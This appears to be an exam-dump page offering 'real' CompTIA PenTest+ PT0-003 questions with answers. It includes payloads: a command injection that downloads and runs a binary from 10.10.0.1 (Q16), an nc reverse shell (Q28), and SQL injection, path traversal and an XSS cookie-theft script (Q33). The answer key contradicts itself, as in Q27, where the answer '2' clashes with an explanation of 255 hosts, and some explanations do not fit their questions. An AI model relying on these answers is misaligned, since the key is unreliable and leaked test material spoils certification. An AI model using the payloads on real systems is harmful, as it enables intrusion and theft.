(2024) PASS PT0-003 exam with CompTIA PT0-003 Real Exam Questions [Q13-Q36]

Real exam questions are provided for the CompTIA PenTest+ test, which can make sure you pass 100%.

NEW QUESTION # 13
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

  • A. Credentials stored in strings
  • B. Non-optimized resource management
  • C. Weak authentication schemes
  • D. Buffer overflows

Answer: D

Explanation:
Fuzzing introduces unexpected inputs into a system and watches for negative reactions to those inputs that indicate security, performance, or quality gaps or issues.


NEW QUESTION # 14
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.
Which of the following methods will MOST likely work?

  • A. Try to obtain the private key used for S/MIME from the CEO's account.
  • B. Attempt to escalate privileges on the mail server to gain root access.
  • C. Move laterally from the mail server to the domain controller.
  • D. Send an email from the CEO's account, requesting a new account.

Answer: B


NEW QUESTION # 15
An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

  • A. Encrypted passwords
  • B. Multifactor authentication
  • C. System-hardening techniques
  • D. Network segmentation

Answer: C


NEW QUESTION # 16
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IF
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. rm -rf /tmp/apache
  • C. grep -v apache ~/.bash_history > ~/.bash_history
  • D. taskkill /IM "apache" /F

Answer: B

Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.


NEW QUESTION # 17
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.
Which of the following tools would be BEST to use for this purpose?

  • A. Hashcat
  • B. Patator
  • C. Mimikatz
  • D. John the Ripper

Answer: B

Explanation:
https://www.kali.org/tools/patator/


NEW QUESTION # 18
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

  • A. ssh 127.0.0.1 5555
  • B. ssh 10.10.1.2
  • C. nc 127.0.0.1 5555
  • D. nc 10.10.1.2

Answer: C


NEW QUESTION # 19
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

  • A. nmap -sn 10.12.1.0/24
  • B. nmap -Pn 10.12.1.0/24
  • C. nmap -sV -A 10.12.1.0/24
  • D. nmap -sT -p- 10.12.1.0/24

Answer: A

Explanation:
Reference: https://www.tecmint.com/find-live-hosts-ip-addresses-on-linux-network/


NEW QUESTION # 20
During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

  • A. Responder
  • B. CrackMapExec
  • C. Hydra
  • D. BloodHound

Answer: B

Explanation:
When a penetration tester obtains an NTLM hash from a legacy Windows machine, they need a tool that can leverage this hash for further attacks, such as pass-the-hash, or for cracking the hash. Here is a breakdown of the options:
Option A: Responder
Responder is primarily used for poisoning LLMNR, NBT-NS, and mDNS to capture hashes, not for leveraging NTLM hashes obtained post-exploitation.
Option B: CrackMapExec
CrackMapExec is a versatile tool that can perform pass-the-hash attacks, execute commands, and more using NTLM hashes. It is designed for post-exploitation scenarios involving NTLM hashes.
Option C: Hydra
Hydra is a password-cracking tool but is not specifically designed for NTLM hashes or pass-the-hash attacks.
Option D: BloodHound
BloodHound is used for mapping Active Directory relationships and identifying potential attack paths, not for using NTLM hashes directly.
Reference from Pentest:
Forge HTB: Demonstrates the use of CrackMapExec for leveraging NTLM hashes to gain further access within a network.
Horizontall HTB: Shows how CrackMapExec can be used for various post-exploitation activities, including using NTLM hashes to authenticate and execute commands.
Conclusion:
Option B, CrackMapExec, is the most suitable tool for continuing the attack using an NTLM hash.
It supports pass-the-hash techniques and other operations that can leverage NTLM hashes effectively.


NEW QUESTION # 21
A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

  • A. cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt
  • B. enum4linux -u user1 -p Password1 192.168.0.1
  • C. enum4linux -u user1 -p /passwordList.txt 192.168.0.1
  • D. cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Answer: A

Explanation:
The cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt command is used to perform SMB enumeration on the 192.168.0.0/24 subnet using a list of usernames and passwords. The -u option specifies the file containing the usernames, and the -p option specifies the file containing the passwords. This command allows the tester to attempt to authenticate with multiple accounts without locking any of them out.
References: SMB Command


NEW QUESTION # 22
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

  • A. Use Patator to pass the hash and Responder for persistence.
  • B. Use Mimikatz to pass the hash and PsExec for persistence.
  • C. Use a bind shell to pass the hash and WMI for persistence.
  • D. Use Hashcat to pass the hash and Empire for persistence.

Answer: B

Explanation:
Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials.
This provides the tester with persistence on the system, allowing them to access it even after a reboot.
"A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)


NEW QUESTION # 23
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Answer:

Explanation:
1. Reflected XSS - Input sanitization (<> ...)
2. SQL Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - parameterized queries
7. SQLi error - parameterized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input sanitization
10. URL redirect - prevent external calls


NEW QUESTION # 24
During an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

  • A. Refrainment from patching systems until quality assurance approves
  • B. Implementation of patching and change control programs
  • C. Revision of client scripts used to perform system updates
  • D. Remedial training for the client's systems administrators

Answer: B

Explanation:
The best way to mitigate this issue is to implement patching and change control programs. Patching is the process of applying updates or fixes to software packages to address vulnerabilities, bugs, or performance issues; change control is the process of managing and documenting the changes made to the software packages to ensure consistency, compatibility, and security. Together they help prevent or reduce the risk of attacks that exploit outdated software package versions, which may contain known or unknown vulnerabilities that can compromise the security or functionality of the systems or servers. Patching and change control programs can be implemented with tools such as WSUS, which manages and distributes updates for Windows systems and applications, or Git, which tracks and controls changes to source code or files.
The other options are not valid ways to mitigate this issue. Revision of client scripts used to perform system updates is not sufficient, as it may not address the root cause of why the software package versions are outdated, such as lack of awareness, resources, or policies. Remedial training for the client's systems administrators is not a direct mitigation, as it may not result in immediate or effective actions to update the software package versions.
Refrainment from patching systems until quality assurance approves is not a way to mitigate this issue, but rather a potential cause or barrier for why the software package versions are outdated.


NEW QUESTION # 25
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host


NEW QUESTION # 26
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • B. Incorporate the newly identified method of compromise into the red team's approach.
  • C. Create a detailed document of findings before continuing with the assessment.
  • D. Perform forensic analysis to isolate the means of compromise and determine attribution.

Answer: A

Explanation:
Halting the assessment and following the reporting procedures as outlined in the contract is the best action to take after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The reporting procedures are part of the contract that specifies how to handle any critical issues or incidents during the penetration testing engagement. They should include details such as who to contact, what information to provide, and what steps to follow.


NEW QUESTION # 27
Given the following Nmap scan command:
[root@kali ~]# nmap 192.168.0.* --exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

  • A. 0
  • B. 1
  • C. 2
  • D. 3

Answer: C

Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is excluded, so the total number of servers that Nmap will attempt to scan is 255.
References:
Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts, Subsection: Excluding Hosts from Search
Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection: --exclude


NEW QUESTION # 28
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Obtain /etc/shadow and brute force the root password.
  • B. Move laterally to create a user account on LDAP
  • C. Create a one-shot system service to establish a reverse shell.
  • D. Run the nc -e /bin/sh <...> command.

Answer: C

Explanation:
https://hosakacorp.net/p/systemd-user.html
Creating a one-shot system service to establish a reverse shell is a technique that would best support maintaining persistence after reboot on a Linux-based file server. A system service is a program that runs in the background and performs various tasks without user interaction. A one-shot system service is a type of service that runs only once and then exits. A reverse shell is a type of shell that connects back to an attacker-controlled machine and allows remote command execution. By creating a one-shot system service that runs a reverse shell script at boot time, the penetration tester can ensure persistent access to the file server even after reboot.


NEW QUESTION # 29
A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?

  • A. nmap -v -p 25 -- soript smtp-enum-users remotehost
  • B. nmap -p 3306 -- script "http*vuln*" remotehost
  • C. nmap --ocript=omb-brute.noe remotehoat
  • D. nmap -v -- script=mysql-info.nse remotehost

Answer: D

Explanation:
The Nmap command in the question scans all ports on the remote host and identifies the services and versions running on them. The output shows that port 3306 is open and running MariaDB, which is a fork of MySQL. Therefore, the best command to discover an exploitable service would be to use the mysql-info.nse script, which gathers information about the MySQL server, such as the version, user accounts, databases, and configuration variables. The other commands are either misspelled, irrelevant, or too broad for the task. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam


NEW QUESTION # 30
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A-----> www
A-----> host
TXT --> vpn.comptia.org
SPF---> ip =2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

  • A. CNAME
  • B. SOA
  • C. MX
  • D. DMARC

Answer: D

Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Step-by-Step Explanation
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject).
rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing - A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups


NEW QUESTION # 31
Which of the following assessment methods is the most likely to cause harm to an ICS environment?

  • A. Active scanning
  • B. Protocol reversing
  • C. Ping sweep
  • D. Packet analysis

Answer: A

Explanation:
Active scanning is the process of sending probes or packets to a target system or network and analyzing the responses to gather information or identify vulnerabilities. Active scanning can be intrusive and disruptive, especially in an ICS environment, where availability and reliability are critical. Active scanning can cause unintended consequences, such as triggering alarms, shutting down devices, or affecting physical processes.
Therefore, active scanning is the most likely to cause harm to an ICS environment among the given options.
References:
The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, pages 72-73.
The Official CompTIA PenTest+ Student Guide (Exam PT0-002) eBook, Chapter 2: Conducting Passive Reconnaissance, page 2-20.
Risk Assessment Standards for ICS Environments, page 8.


NEW QUESTION # 32
A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.
Which of the following commands should the engineer use to achieve the objective in the least amount of time?

  • A. nmap -T4 -p 80 10.0.0.0/16 --max-rate 60
  • B. nmap -T5 -p 80 10.0.0.0/16 --min-rate 80
  • C. nmap -T3 -p 80 10.0.0.0/16 --max-hostgroup 100
  • D. nmap -T0 -p 80 10.0.0.0/16

Answer: A

Explanation:
The nmap -T4 -p 80 10.0.0.0/16 --max-rate 60 command is used to scan the 10.0.0.0/16 subnet for web servers (port 80) at a maximum rate of 60 packets per minute. The -T4 option sets the timing template to "aggressive", which speeds up the scan. The --max-rate option limits the number of packets sent per second, helping to bypass the network IPS that isolates the source when the scan exceeds 100 packets per minute.
References: Nmap commands


NEW QUESTION # 33
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?

  • A. /var/www/html/index.php;whoami
  • B. 1 UNION SELECT 1, DATABASE(),3--
  • C. ../../../../../../../../../../etc/passwd
  • D. <script>var adr= '../evil.php?test=' + escape(document.cookie);</script>

Answer: B


NEW QUESTION # 34
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. SLA
  • B. NDA
  • C. ROE
  • D. MSA

Answer: B


NEW QUESTION # 35
A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

  • A. Smishing
  • B. Impersonation
  • C. Whaling
  • D. Tailgating

Answer: A

Explanation:
When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here's why:
Understanding Smishing:
Smishing (SMS phishing) involves sending fraudulent messages via SMS to trick individuals into revealing personal information or performing actions that compromise security. Since the tester has access to phone numbers, this method is directly applicable.
Why Smishing is Effective:
Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding.
Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important.
Alternative Attack Techniques:
Impersonation: While effective, it generally requires real-time interaction and may not scale well across many targets.
Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.
Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it is more specific and may not be suitable for the broader set of employees in the directory.

